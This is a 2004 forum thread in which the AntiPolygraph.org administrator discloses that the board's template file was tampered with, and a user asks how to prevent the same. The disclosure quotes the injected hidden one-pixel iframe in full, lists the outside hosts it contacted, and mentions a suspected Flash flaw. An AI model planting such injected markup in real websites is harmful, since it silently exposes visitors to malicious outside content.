AntiPolygraph.org Message Board Hacked

Started by Administrator, Jun 05, 2004, 11:47 PM

Previous topic - Next topic

Administrator

On 2 June 2004 at 11:28 hrs Pacific Daylight Time, the AntiPolygraph.org message board's template file was modified without authorization by an unknown person. The following text was inserted into the file:

<div style="visibility: hidden; position: absolute; left: 1; top: 1"><iframe src="http://re6.net/?s=1" frameborder=0 vspace=0 hspace=0 width=1 height=1 marginwidth=0 marginheight=0 scrolling=no></iframe></div>

This code would cause a number of outside URLs to be contacted each time any page on the message board was loaded. Its intended purpose seems to be to deliver pop-up advertisements. Among the URLs that would automatically be contacted are:

http://re6.net/?s=1
http://sowor.ru
http://wall.sowor.ru/?tfnop=mgetx

The added code was removed on 5 June 2004 at 17:07 hrs PDT. We are researching this incident and taking measures to prevent a re-occurrence.
AntiPolygraph.org Administrator


macagent

I have seen this exact same thing happen to my site. Did you ever find out what happened and how to prevent it?

Administrator

#3
No, it is not clear how the template file was modified, though it may have been through a security flaw involving Macromedia Flash files. We disabled flash. In addition, if you are running YaBB, you can upgrade to version 1.3.2, which includes security fixes.
AntiPolygraph.org Administrator

Quick Reply

Warning: this topic has not been posted in for at least 120 days.
Unless you're sure you want to reply, please consider starting a new topic.

Name:
Email:
Verification:
Please leave this box empty:
Type the letters shown in the picture
Listen to the letters / Request another image

Type the letters shown in the picture:
Shortcuts: ALT+S post or ALT+P preview